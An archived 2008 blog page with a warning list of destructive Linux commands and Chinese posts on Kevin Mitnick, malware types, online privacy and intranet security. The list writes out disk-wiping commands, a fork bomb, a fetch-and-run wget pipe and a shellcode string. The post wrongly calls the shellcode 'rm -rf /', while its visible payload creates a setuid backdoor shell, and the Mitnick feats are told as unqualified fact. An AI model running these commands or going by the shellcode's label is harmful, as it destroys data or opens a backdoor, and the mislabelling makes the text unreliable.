Monday, December 29, 2008

7 deadly linux cmds

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

source: 1,2

Saturday, December 20, 2008

Saturday, December 13, 2008

被FBI通缉的黑客--Kevin Mitnick


传奇事迹:
  ·侵入美国国防部、中央情报局、五角大楼及北美空中防务体系等防守严密的网络系统。从而对美国一些国家机密了如指掌。  
  ·闯入美国国家税务总局网络,窃取了许多美国名人纳税的绝密资料。  
  ·从纽约花旗银行非法转移数字庞大的美元到指定账户。

  看到这些案例,想必你和小马一样已经感到毛骨悚然了吧。Kevin Mitnick,一位在世界范围内举重若轻的黑客。他曾被媒体作为新闻标题、被电视节目作为评说对象,无数的黑客书籍以敬畏的口吻崇拜着他。有人曾用这样的语句形容他:“他旁若无人地站在白宫走廊的一角,目光深邃。一台笔记本电脑与他寸步不离,他不时在键盘上敲下某些神秘的指令……”。

  Kevin Mitnick会使用一切可能的方法,弄到希望攻破的系统的源代码和技术手册。他还会花大量的时间来研究这些枯燥的字符中的弱点与内部工作原理。

  他告诉我们,研究源代码+对源代码的了如指掌+耐心=成为黑客高手的基本要件。

  15岁时,Kevin Mitnick用打工赚的钱买了一台计算机,当他“闲逛”到北美空中防务指挥系统后,神秘的政府机关使他的好奇心达到了极致。他彻底研究系统的源代码中可能存在的漏洞。两个月过去后,他终于找到了这个系统的后门,那是程序设计者为方便自己的出入而留下的。第一次做黑客,就以远远超出其年龄的耐心和毅力成功了。

more>click here

必須知道的病毒常識..


必須知道的病毒常識..

病毒
病毒是一段電腦程式碼,它會將自身附加到程式或檔案,在電腦之間傳佈,並在旅行途中感染電腦。病毒可能會損壞您的軟體、硬體和檔案。病毒(n.)為程式 碼,以表達複製自身的意圖寫成。病毒會嘗試將自身附加到主機程式,嘗試在電腦之間傳佈。它可能會損壞硬體、軟體或資訊。就像人類病毒的嚴重性範圍,可從伊 波拉病毒到 24小時流感,電腦病毒的範圍也可歸類為溫和侵擾到完全毀滅。幸運的是除非人們移動真正的病毒(如共用檔案或傳送電子郵件),否則它們並不會傳佈開來。

病蟲
是一種不需使用者介入即可傳播其本身的程式。以技術層面來說,病蟲並不是病毒,因為它能獨立繁殖。一個很有名的例子就是 ILOVEYOU電子郵件病蟲,它能透過電子郵件將其本身自動傳送到收件者通訊錄中的每個人。 病蟲可透過網路或區域網路,迅速將本身傳送到成千上萬台電腦中。

蠕蟲
蠕蟲 (Worm)就像病毒,它的設計目的是在電腦之間複製它本身,但它會透過掌控電腦上可傳輸檔案或資訊的功能自動進行複製。一旦系統有蠕蟲時,它便會獨自行 進。蠕蟲極具危險的一點是,它會大量複製。例如,蠕蟲可將它本身的複本傳給您電子郵件通訊錄所列出的每個人,該人員的電腦接著會執行相同的動作,從而發生 大量網路流量的連鎖效應,並進一步降低整個企業網路和網際網路的速度。當新的蠕蟲散播時,它們會以極快的速度散佈開來,塞滿網路並可能讓您 (及每個人)必須等待兩倍的時間才能檢視網際網路上的網頁。蠕蟲 (n.)病毒的子類別。蠕蟲通常不需要使用者的動作即可散佈,而且它會將它本身的完整複本(可能已修改)透過網路發佈。蠕蟲可耗用記憶體或網路頻寬,使得 電腦停止回應。由於蠕蟲不需要透過「主機」程式或檔案即可傳播,所以它們也能入侵您的系統,並讓他人從遠端控制您的電腦。最近流行的有: Sasser 和 Blaster 蠕蟲。

巨集
是一種內嵌檔案,可在使用者不知情的狀況下自動執行軟體指令的語言。當下載或執行巨集之後,它們對於使用者的檔案就擁有完全的存取權,並且可執行撰寫人員所指定的系統修改動作。許多 Windows 型巨集都是 以 Visual Basic 所撰寫。

網路駭客
如果您的電腦在未受保護的情形下存取網路,那麼任何「駭客」或「破解者」都可以任意非法進入您的電腦了。事實上,寬頻會讓駭客活動更為容易,因為雖然連線 速度加快了,但是不長變換的 DNS (網域名稱系統 Domain Name System)位址會讓您的電腦幾乎永遠處於連線狀態,此狀況可讓網路駭客更容易破解您個人電腦的密碼。至於更惡劣的駭客會使用機動程式碼,透過您的寬頻 連線堂而皇之的登入您的硬碟,竊取或摧毀您的檔案。

特洛伊木馬程式
特洛伊木馬程式就像神話中所述的一樣,看起來像是一件禮物,但結果卻是一些突擊特洛伊城的希臘士兵,今日的特洛伊木馬程式看起來像是有用軟體的電腦程式, 但它們卻會危害您的安全性並造成許多的損害。最近的特洛伊木馬程式的形式為一封電子郵件,其包含宣稱為 Microsoft安全性更新的附件檔,之後即化身為病毒並嘗試停用防毒軟體和防火牆軟體。特洛伊木馬程式(n.)看似有用,但實際上卻會造成損害的電腦 程式。當人們被引誘開啟程式 (因為他們認為該程式來自合法來源)時,特洛伊木馬程式即會散佈開來。為了更完善地保護使用者,Microsoft通常是透過電子郵件寄出安全性公告,但 絕不會包含附件檔。在我們將所有安全性警訊以電子郵件傳送給客戶前,會先在我們的安全性公告網頁上進行公佈。您下載的免費軟體也可能包含特洛伊木馬程式。 絕不要從不信任的來源下載軟體。請務必從 Microsoft Windows Update 或Microsoft Office Update 下載 Microsoft 更新和修補程式。

ActiveX
控制項有時類似 Java Applet (但是它們是根據 Microsoft 微軟開發的技術而成),可完全存取 Windows 作業系統,因此有時比 Java Applet 更危險。
VBScript
是一種與 Netscape 的 JavaScript 相似的 Microsoft 指令檔語言,可將其互動式元素內嵌到 HTML 文件中。
■ 僵屍 (zombie)
這個術語是用來表示一台被秘密植入潛伏程式的電腦,它可在稍後醒來並協助對另一個系統發動集合式攻擊。「僵屍」是一種相當新穎的攻擊方式。

機動程式碼
機動程式碼事實上就是指定應用程式交換使用者資訊的程式設計。它是由 Web 開發人員所建立,用來撰寫 Web瀏覽器自動下載並執行的應用程式。然而,它也可以成為電腦戰爭中的武器。只要它被下載到您的系統上,駭客就能在您不知情的狀況下,將您電腦上的資料 傳輸至他們的電腦中。他們可以竊取您的密碼或個人隱私資訊、移除或傳輸重要檔案,甚至還能使您的電腦系統無法運作。

機動程式碼的常見形式:

Java Applet 是使用 Java程式設計語言所撰寫的自動執行程式 (原本是由 Sun Microsystems 所開發)。Java Applet可以執行各種工作,也可以內嵌在網頁中,或是以電子郵件附件的形式傳送。因為大部份的 Web 瀏覽器都是設定為自動執行,所以惡意的JavaApplet 就成為嚴重的威脅。您可以變更 Web 瀏覽器的設定,使其在執行前先警告您。

揭开互联网间谍真面目

首 先声明:互联网上任何组织或个人无任何权力和理由,去偷窥合法用户的隐私内容。用户的私人资料,被当作商品一样随意买来卖去。甚至各种收集资料的所谓的商 家,不顾任何法律条文,任意向合法及非法的买家出售统计数据,甚至是非法买家的马前卒。这些数据将严重危及用户自身安全,因此整理此类文章,保障用户基本 权益。 这些都是间谍行为!在互联网上除了利用各种漏洞的木马,病毒直接对用户进行入侵外,各种嗅探,侦听程序也层出不穷。除了这几种方式外,还有几种不为人知的几种方式:,下面详细介绍:

(一) 网站的窥视:
(A) 网站是通过IP作为中介与用户交互信息。你的计算机在网上每发一个数据包,都有一个您自己的IP地址,也包括网站的IP地址,这样才能互相收到各自的信息。
如果使用的是永久连接方式(如:专线,宽带),那您的IP很可能固定不变。这样如您在网上移动时,窥视者就可通过IP进行跟踪。收集您在网上的踪迹,比如:您都去过什么网站,做过什么事情等等。网站本身也可对您进行统计,然后出售给任何想要的人。
(B) 如果是拨号用户,每次拨号,ISP分配给你的IP每次可能都不同。而且所有的机器都在防火墙后面,这样IP就不能很好的对用户进行识别辨认,于是COOKIES出现了。
邮箱或论坛等等进行登陆,都需要有个COOKIE。服务器就将一个对您进行识别和描述交易的COOKIE放在了您的机器上,这样服务器就能记住您是谁,做过什么事情。有一种是关闭浏览器就会消失的暂时COOKIE,另一种是可能保留数月或更长时间的持久COOKIE。
这种COOKI非常方便,服务器可以通过您的机器上的COOKIE对您进行识别。那么服务器中的有关你的旅程中的全部信息,有可能通过合法或非法的方式被人收集,整理,因此要选择信誉和知名度比较好的站点。

(二) 不安全的COOKIE
(A) “拼凑”的网页
一个网页可能包括文本,图片,广告,FLASH等等部件组成。这些部件可能分别来自于不同的服务器。浏览器通过网页编辑的语言模式从不同的服务器调出所需部件,拼凑成现在的页面。这些不同的服务器都可以向您的机器分别发送各自的一个COOKIE,稍候收回。
如:访问含有广告的网站,由于每次访问页面,广告公司都会发一个COOKIE。当您从一个网站转到另一个网站,如果这两个网站都含有同一广告公司的广告, 该广告公司就可通过它的COOKIE看到您从一个网站转到另一个网站。假如:广告公司从网站所有者那里得到你的有关个人信息,它就可在你访问另一个页面使 用此信息。然后进行收集整理。
(B) 邮件的COOKIE
在互联网上,COOKIE窥视不受限制。在网络浏览器中使用翻译引擎,有的同时也编进了邮件的客户端程序及新闻组。这样别人给您的电子邮件或HTML文章 贴在新闻组。当您阅读邮件(或文章)时,你的机器会访问她或他机器的图片。随即发送者即可知道您看了什么消息,如果消息中定制了URL,内含邮件地址,就 将知道您是谁。除非修正了安全漏洞,否则就能通过COOKIE进行个人信息收集。
(C) 计算机中的安装软件有的也能把信息放在COOKIE中,以便稍候收回。如:WINDOWS 98的注册向导。注册向导的ACTIVEX控件还有个漏洞,允许任何网站随意收回这个COOKIE中的注册信息,因为COOKIE中放有注册信息。
(D) 预防不安全的COOKIE方法
(1)全面禁止使用COOKIE,一般浏览时把COOKIE全部禁止。主要在浏览器的属性中修改,使其禁止。一般不会有什么麻烦,但如进行各种登陆,就需要COOKIE进行识别。
(2)选择阻塞或禁用COOKIE,如:使用webwasher软件,Internet JunbusterProxy软件,都能阻塞网络服务器发送的cookie,不影响正常登陆。像cookiecrushera也能让您自己控制哪个网站可 保存cookie。这些软件不能阻止JavaScript、Java程序的cookie。
如果选择性阻塞cookie,要经常删除C:\WINDOWS\Temporary InternetFiles内的COOKIE文件,C:\WINDOWS\Cookies内的文件。象cookie: xxxxx@ads.sohu.com都是不安全的cookie,也含有独一无二的id标记:如XXUserID
xxxxxxxx-xxx-xxxxxxx-x
ads.sohu.com/
xxxx
xxxxxxxxxx
xxxxxxxx
xxxxxxxxxx
xxxxxxxx
*
.
(3)防止cookie通过电子邮件放置在你的机器上,不要选用察看邮件是自动调用网络服务器的翻译引擎的邮件程序。如果是outlook或 outlookeexpress,你只能用IE的翻译引擎。但其它的邮件客户端程序就会给你一个选择,请不要选中微软的阅读器的复选框,那样就不会调用 IE察看邮件。COOKIE就不会对你进行跟踪。
(4)IDcide的IDcide Privacy Companion免费浏览器插件,能有效解决这个问题,但没有IE6.0版。说明详见“防范网络追踪”地址:
http://www.internetfreedom.org/gb/index.html
http://worldfreenet.org/gb/index.html
(5)IE6.0的COOKIE选项也能有效解决这个问题。IE的属性的隐私,可对COOKIE选择:
a.最高:是全部禁止,不能被任何网站写入或读出任何信息。
b.高:阻止使用个人可标识信息而没有明确许可的COOKIE。
c.中高:阻止使用个人可标识信息而没有明确许可的第三方COOKIE,阻止使用个人
d.可标识信息而没有隐含许可的第一方COOKIE.
e.中:阻止使用个人可标识信息而没有隐含许可的第三方COOKIE,阻止使用个人可标识信息而没有隐含许可的第一方COOKIE.
f.低:限制使用个人可标识信息而没有隐含许可的第三方COOKIE.
最低是接受所有COOKIE.
(6)使用间谍防火墙--spyblocker,说明见下。
(三) 硬盘中的间谍
(1) 硬盘中怎么会有间谍呢?原因是我们安装了不友好的程序。绝大多数是共享软件或免费软件带来的。共享或免费的条件是帮助广告商收集个人资料来换取广告商的资助。
这些间谍是在安装原始的共享或免费程序的同时被安装。共享或免费应用程序通常称为宿主程序。即使卸载宿主程序,间谍也会留在计算机中,原因是宿主程序的卸 载模块不含有间谍部分,不能被卸载。间谍常常进驻注册表中,在后台秘密工作,并在每台微机“刻”上独一无二的id标识,这种标识一般在注册表中。
间谍程序主要监视点击的广告,用户使用那些程序,访问过那些网站,扫描注册表,搜集各种个人信息。即使卸载或不运行宿主程序,或者已经离线,也会继续搜集资料。
当你上线时,间谍程序就被唤醒,秘密与远程服务器通信,上传用户资料。
注意:一般这类软件,在安装过程中没有提示,安装结束时,再告诉您已经安装广告支持软件。这种间谍没有专门的清除程序,用户是无法清除的。
(2)一些合法的应用程序在特定条件下,也会收集或暴露个人信息。
如互联网在线聊天系统(IRC)的客户端程序,使用identd协议,允许互联网的任何人询问你是谁。许多ISP同样使用identd协议。
有一些软件本身也在收集用户浏览习惯,或其它一些信息。如:Realplayer软件,可以监测消费者察看内容。但该公司有一个补丁可以禁止这种窥探行为。
(3)预防方法:
上面提到的第(2)一些合法的应用程序在特定条件下,也会收集或暴露个人信息的解决方法目前不能预防,只能不去用这些工具。下面对(1)的解决方案有几种:
(A)到正规的站点下载软件:如ZDNET网站下载软件,含有间谍程序的软件都已被注明。
如果下载不清楚,注意程序安装过程中要求的许可协议和注册信息。有很多免费软件的用户注册表格是为间谍软件统计数据的来源。
如果应用程序的用户界面含有旗帜标栏广告的都可能在使用间谍程序。
(B)介绍两款清除间谍程序的工具:
(1)Gibson公司的Optout软件。但是我只看到过期的测试版,不知道有没有新的版本,也是免费的软件。这个工具可以扫描硬盘,注册表,也能删除或隔离间谍程序,宿主程序不受影响。
下载地址:http://grc.com/files/optout.exe.
(2)lavasoftusa公司的Ad-aware软件也能对内存,注册表,磁盘进行扫描。也能进行彻底清除,但最好备份一下。我试过感觉不错,几乎不 影响其它程序,但我的浏览器(IE),出了的小问题,也能正常使用!建议是卸载当前的IE版本,使用该程序进行对间谍程序处理,然后再安装当前的版本,这 个小问题就没了。下载地址:http://www.lavasoftusa.com/
总之:本人观点是断点续传软件,网上交流软件,搜索软件等类型的软件,很多暗藏玄机。
(C)善用防火墙:
如Zeroalarm防火墙,能监视所有的因特网的通信量,可以阻止任何未经授权的数据传递,也能隔离程序传递信息。但有时间谍程序捆绑在常见的程序中,防火墙就不能很好的处理,那样防火墙就允许间谍程序通过,最好是把间谍程序删除后,对防火墙进行设置,如捆绑在:
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE,C:\WINDOWS\NOTEPAD,EXE,C:\WINDOWS\EXPLORER.EXE 很难发现。
使用工具清除间谍程序后,也要善用防火墙。如只使用浏览器浏览,那就不能让其它程序通过!把防火墙的安全设置为最高,对间谍主机服务器地址进行拦截:
步骤:
(1)运行注册表(regedit),运行“C:\WINDOWS\regedit.exe”或在开始菜单,运行中添入:regedit,打开注册表。
(2)找到充当间谍的注册表项,如:aureate项,可用注册表的搜索查找。
(3)找到后,记下默认的广告(间谍)主机服务器的主机地址。
(4)在防火墙中进行地址拦截,如zonealarm,在主界面的security(安全)选项下的configure(配置)中的restricted zone中用add(加入)地址。
简便的方法:就是把spyblocker软件中所要拦截的主机服务器都加进去。
(D)使用间谍防火墙----SPYBLOCKER,拦截所有间谍程序。

(四) 网络爬虫(web bugs)

这是更加难缠的角色。也叫网络臭虫。是跟踪网上冲浪和浏览习惯的更加隐蔽的方法。网络爬虫是很小很小一个图片,也可能是一个小点,它被植入网页或html编写的网页中。是非非常隐蔽的小程序,很难发现。

当用户浏览含有网络爬虫的网页时,网络爬虫会自动给您的系统做一个独一无二的ID标识,有的在您的计算机中放置COOKIE,然后源源不断的把你的有关信 息传递给远端服务器,比如浏览了哪条新闻等,远端服务器就可对你的资料进行处理,统计。网络爬虫更恶劣的是不能被COOKIE过滤软件过滤,因此网络爬虫 的危害超出COOKIE.

解决方法:

(1)Dcide公司的IDcide Privacy Companion,其它同上。

(2)使用间谍防火墙----SPYBLOCKER,拦截所有web bugs.

(五) 四处游荡的代码

有很多网站内含有非常不友好的代码,这些代码通常是JavaScipt或VBSScipt语言编写而成。这些小段代码能将一些小文件下载到你自己的机器上。这些文件可能为病毒,木马或一个脚本,它能搜集您的信息,返回给需要的人。

大家清楚,最近网络上的恶性代码异常嚣张,能对注册表等等进行操作。我测试过一段代码,居然我的诺敦防火墙和最好的黑客防火墙都没有反应。这不是说这些防火墙不好,这些防火墙不是用来防这些代码的。像诺敦也能防恶性代码,可是我测试的代码可就不简单了。

防范方法:

(1)将浏览器的安全设置为最高,这样ACTIVEX和JAVASCIPT就禁止运行,文件下载也为禁止。 

(2)删除WSH(Windows Scripting Host),像欢乐时光就是一个典型

。免疫步骤是:单击“开始”->“设置”->“控制面板”->“添加/删除程序”->“Windows安装程序”--“附件”,将“组件”中的“Windows scripting host”“选择划勾”去掉,然后“确定”即可。

(3)注册表加锁:禁止修改注册表。

加锁方法如下:

   (a)运行注册表编辑器regedit.exe;

  (b)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编 辑器regedit.exe.

解锁方法如下:

   用记事本编辑一个unlock.reg文件,内容如下:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。

注意:,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!

(4)下载Microsoft Windows Script 5.6,是个浏览器脚本补丁。

包括VBScript、JScript、Windows Script Components、Windows Script Host 、 Windows Script Runtime 、Windows Script Host 等等一些改进。

能解决脚本的一些问题,这个代码的解决方案没有进行过测试,琢磨使用。
(六) 各种软件留下的痕迹

(1)像浏览器留下的缓存,历史等的记录。用Window Washer 4.1(目前最高版本)清理系统,是个付费的东东。新版本增加了对密码,浏览后的颜色等等清除。强烈建议使用,能彻底粉碎记录。地址:http://www.webroot.com,不要忘了付费。

(2)文件的删除用erase软件。一般的删除只是在文件分配表把文件名删除了,实际上内容还在。有的格式化也不行,就像围棋的棋子,黑白分明,用涂料涂 了一遍,黑的白的是不是还能看出来。必须是全部置为“1”或“0”,可随机覆盖。erase软件就是这样的东西,新版能把文件名彻底删除。

(3)各种文件的打开使用记录,像Word、Realplayer、Winzip、Windows的打开路径,最近使用的文件等等都有记录,虽然可以把文 件的内容删掉,但这些软件使用的文件名是逃不掉的。网络蚂蚁,网际快车等断点续传工具都对下载的文件日志等有记录。防火墙也有使用各种程序的记录,即使把 防火墙的程序删除,但它的日志确有详细记录。这些记录都不能彻底清除,怎么办?

方法一:使用Window Washer的Plugin清理。要想清理这些“间谍”,需要先下载相应的Plugin,然后安装就可以了。但是你必须有Window Washer主程序。

  Plugin下载地址:

http://www.webroot.com/plugin_aj.htm,表示软件名称的第一字母范围是(a-j)。

http://www.webroot.com/plugin_kp.htm,表示软件名称的第一字母范围是(k-p)。

http://www.webroot.com/plugin_qz.htm,表示软件名称的第一字母范围是(q-z)。

有插件的软件表如下:怎么还不动手我们经常用的都在呀!

(A)a打头:ACDSEE32 ,Addsoft ,Addweb 3 ,Adobe Acrobat Reader 3.x,Adobe Acrobat Reader 4.x,Adobe Acrobat Full 4.x,Adobe Photoshop 5.x/6.x ,Allaire Homesite 4.x,AOL Instant Messenger,AOL Temporary Download Folder ,Animation Shop 1.x and 3.x ,AudioCatalyst ,AudioGrabber ,Axialis Media Browser

(B)b,c,d,e,f打头:Babylon ,Bookreader ,Chameleon Web Browser ,Classify 98 (Trellian Software) CoolEditPro,Copernic 2000 ,Corel Photopaint 8 ,Cute FTP ,Cute MX ,CRT 2.x,Diskeeper by Executive Software ,Download Accelerator, EditPad,Enigma Browser ,Eudora by Qualcomm,Fix-It 2000,Fireworks 3 and 4 ,FlashGet(JetCar),Fort s Free Agent,Freecell (MS Windows),Front Page Express,FTP Voyager

(C)g-l打头:Gator ,GetRight,Go!Zilla,GoldWave Editor,Google Toolbar ,Gravity Newsreader ,Graphic Workshop Pro

,Hot Java Browser 3.0,ICQ 98a,ICQ 2000 ,IE Default Save Location ,Inoculatelt PE Virus Scan ,InterQuick,Irfanview 32,Juno,Kodak Imaging for Windows,Letterbox ,LingoMail 1.x,LView Pro 2.x

(D)g-m打头:,Macromedia Dreamweaver 3 and 4 ,MGI Photosuite SE 1.x

,MIRC ,Micrografx Picture Publisher 8,Microsoft Photo Editor 3.0

,Microsoft Front Page,Microsoft Visual Studio ,Microsoft Windows Media Player,Microsoft Windows Paint,Microsoft Windows Word Pad,MSN Explorer Browser 6 ,Microsoft Word Backup Files ,MSWorks 4.0,Mijenix Powerdesk 3,MusicMatch Jukebox

(E)n-s打头:,Napster,Naviscope , NeoPlanet ,NetAnts,Netmeeting,Netsonic,Netzip Download Demon ,Norton Anti-Virus 2000 ,NoteTab Series ,Opera 3.x Web Browser,Opera 4.0 and 5.0 Web Browser,Onespace by Enfish ,Outlook Express 5.x,Paint Shop Pro ,PhotoDraw 2000,PhotoExpress ,PhotoImpact ,PhotoImpact Viewer,Powerdesk 4,PKZip for Windows,PowWow by Tribal Voice ,Psion Psi-Win 2.x,RealDownload,RealPlayer G2/6.x/7.x/8.x,SearchWolf by Trellian

,Scour Exchange ,Sonic Foundry''s Acid 2.0,Sonique,Spinner Plus,StarOffice,SubmitWolf by Trellian,SubmitWolf DE by Trellian,

(F)t-z打头:Teleport Pro ,TextPad 3.x/4.x,Third Voice 1.x,ThumbsPlus 4,Ultimate Paint,VuePrint ,Webferret,WinAce Archiver 1.0,WinAmp,Windows App Log Directory,Windows Commander,Windows 95/98/ME Log Files ,Windows 95/98/ME Address Book & Contacts ,Windows ME Regedit ,Windows Recent Network Drive List,Windows Web Folders ,WinRAR (All Versions),Winzip 7.x & 8.x,Xara 3D v4.0,Xing MP3 Player ,Yahoo! Player,Yamaha S-YXG100 ,ZipMagic,Zone Alarm from Zone Labs

方法二:使用超级兔子,到主界面的清除垃圾看看,有文档菜单,查找文件菜单,运行菜单,最后打开,另外保存为,搜索电脑,安装盘路径,IE历史站点,IE 自动完成填充密码,NETSCAPE3历史站点,网络连接历史记录,URL历史记录文件夹,WINDOWS的画图、写字板、媒体播放器,WINZIP的解 压路径、打开文件、选择文件,WPS的选择文件,ACDSEE的打开路径,REALPLAYER 6.O的打开文件,EXCEL 2000打开文件,FRONTPAGE的插入超连接、图片,就这些。

还可以使用超级兔子的注册表优化,不要担心,我试过非常安全。如果把文件内容删除,在注册表中是有一些记录(如文件名)。用注册表优化可以删除这些文件名。但我认为还是WINDOWS WASHER的插件比较好。
(七)ISP窃听

“加拿大北方电信公司于2001年推出了一种能够使因特网服务供应商跟踪用户在计算机网络浏览、下载等活动的软件新技术。如今,普通网络用户经常接触、也 是因特网内部使用最为频繁的组成部分,万维网(WWW)已是“环球等待(World Wide Wating)”。要是获得用户在因特网上所处位置、所需信息的类别等信息,然后再由因特网服务供应商的服务器作出响应,在“后台”采取相应措施,上网速 度肯定会大大加快。”转自:《“食肉动物”在行动》(王致诚)。

如果因特网服务供应商利用新技术提供的便利收集和掌握用户个人爱好、网上商务活动的习惯之类的信息和资料,然后转手卖给其它人。

ISP窃听这个我可没办法,一边赚着钱,一边出卖用户资料换钱,一举两得。别得意,可以使用加密,代理这个就不说了。如果因特网服务供应商还有越格的行为,只能实施法律制裁,秋后算账。
(八) 政府对网民的电子邮件极感兴趣

为了监视因特网上的电子邮件,美国联邦调查局设计了一个叫 CARNIVORE(食肉动物)的软件。该软件安装在因特网服务商有关网站的服务器上,检查过往的邮件,如果发现有与美国法律相抵触的内容,软件就会自动 跟踪或者截获这个邮件。这个软件被美国一些公众网、美国网民协会和一些网络论坛披露出来后,引起激烈的争论。一些网民认为这是美国政府网络操纵干涉个人自 由的一个具体例证。

“食肉动物”其实一直在监视全球的电子邮件,这种计算机系统在一秒内可浏览数百万份电子邮件。对于这种有很大争议的行为美国联邦调查局公开的解释是:用它 来调查黑客及反恐怖活动和追击贩毒活动。美国政府曾为它沾沾自喜:在2000年6月,就是凭这一软件发现了一些网虫竟通过网渗透到美国联邦毒品监督局去找 有关毒品的情报。而在世界上进行监督公民活动的国家也不仅是美国,如英国也通过一个法律,批准政府在网络服务商的服务器安装黑匣子以监督电子邮件。转自: 《“食肉动物”在行动》(王致诚)。

根据网络上一些文章可以看到X国也对臣服的网民进行类似的监控。

(九) 辐射泄漏个人资料

“各国企业监督员工的主要办法是利用一些专用软件,通过软件就可以发现你上班时间到底浏览了哪些网页。最新的间谍监督软件功能更加强大:你正在你的电脑前 输入有关内容,在另一间办公室里的监督人员可以实时地看着你打的东西出现在他的电脑屏幕上。”转自:《“食肉动物”在行动》(王致诚)。

防治方法见:金属网罩并接上深埋的地线后,能有效地屏蔽掉任何电磁辐射!显示器旁接上一个类似电视室内天线的电磁波发射装置,理论上由干扰天线发射的电磁 波可以做到和显示器的辐射在同样的波段上,从而掩盖掉微机信号的辐射。但实际上,每一种CRT显示器的辐射可能是有差别的,所以使用这种干扰天线必须注意 两点:一是这种干扰天线本身必须具有较宽的波段范围;二是必须对每一套配套使用的装置进行检测和调试,以使CRT和干扰天线发射的电磁波真正处于干扰状态 下。

---转自:《防止电脑泄露秘密的绝招 》,作者不详。

总之,随着技术日新月移,还会有其他的间谍方式进行搜集资料,也将更难处理。最最有效的方法是创建一个相当可靠的系统,里面是一些常用的工具,这些工具可 是从来没用过。然后使用磁盘镜像工具,如:Norton的Ghost(2002),运行平台WIN9X,几分钟就可恢复原来面目,什么木马,病毒,间谍统 统一边去。如果一天恢复一次,各种窥视都将付诸东流。(完)




网管须知:内网安全技术十大策略


几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。

  大多企业重视提高企业网的边界安全,暂且不提它们在这方面的投资多少,但是大多数企业网络的核心内网还是非常脆弱的。企业也对内部网络实施了相应保护 措施,如:安装动辄数万甚至数十万的网络防火墙、入侵检测软件等,并希望以此实现内网与Internet的安全隔离,然而,情况并非如此!企业中经常会有 人私自以Modem拨号方式、手机或无线网卡等方式上网,而这些机器通常又置于企业内网中,这种情况的存在给企业网络带来了巨大的潜在威胁,从某种意义来 讲,企业耗费巨资配备的防火墙已失去意义。这种接入方式的存在,极有可能使得黑客绕过防火墙而在企业毫不知情的情况下侵入内部网络,从而造成敏感数据泄 密、传播病毒等严重后果。实践证明,很多成功防范企业网边界安全的技术对保护企业内网却没有效用。于是网络维护者开始大规模致力于增强内网的防卫能力。

  下面给出了应对企业内网安全挑战的10种策略。这10种策略即是内网的防御策略,同时也是一个提高大型企业网络安全的策略。

  1、注意内网安全与网络边界安全的不同

  内网安全的威胁不同于网络边界的威胁。网络边界安全技术防范来自Internet上的攻击,主要是防范来自公共的网络服务器如HTTP或SMTP的攻 击。网络边界防范(如边界防火墙系统等)减小了资深黑客仅仅只需接入互联网、写程序就可访问企业网的几率。内网安全威胁主要源于企业内部。恶性的黑客攻击 事件一般都会先控制局域网络内部的一台Server,然后以此为基地,对Internet上其他主机发起恶性攻击。因此,应在边界展开黑客防护措施,同时 建立并加强内网防范策略。

  2、限制VPN的访问

  虚拟专用网(VPN)用户的访问对内网的安全造成了巨大的威胁。因为它们将弱化的桌面操作系统置于企业防火墙的防护之外。很明显VPN用户是可以访问 企业内网的。因此要避免给每一位VPN用户访问内网的全部权限。这样可以利用登录控制权限列表来限制VPN用户的登录权限的级别,即只需赋予他们所需要的 访问权限级别即可,如访问邮件服务器或其他可选择的网络资源的权限。

  3、为合作企业网建立内网型的边界防护

  合作企业网也是造成内网安全问题的一大原因。例如安全管理员虽然知道怎样利用实际技术来完固防火墙,保护MS-SQL,但是Slammer蠕虫仍能侵 入内网,这就是因为企业给了他们的合作伙伴进入内部资源的访问权限。由此,既然不能控制合作者的网络安全策略和活动,那么就应该为每一个合作企业创建一个 DMZ,并将他们所需要访问的资源放置在相应的DMZ中,不允许他们对内网其他资源的访问。

  4、自动跟踪的安全策略

  智能的自动执行实时跟踪的安全策略是有效地实现网络安全实践的关键。它带来了商业活动中一大改革,极大的超过了手动安全策略的功效。商业活动的现状需 要企业利用一种自动检测方法来探测商业活动中的各种变更,因此,安全策略也必须与相适应。例如实时跟踪企业员工的雇佣和解雇、实时跟踪网络利用情况并记录 与该计算机对话的文件服务器。总之,要做到确保每天的所有的活动都遵循安全策略。
5、关掉无用的网络服务器

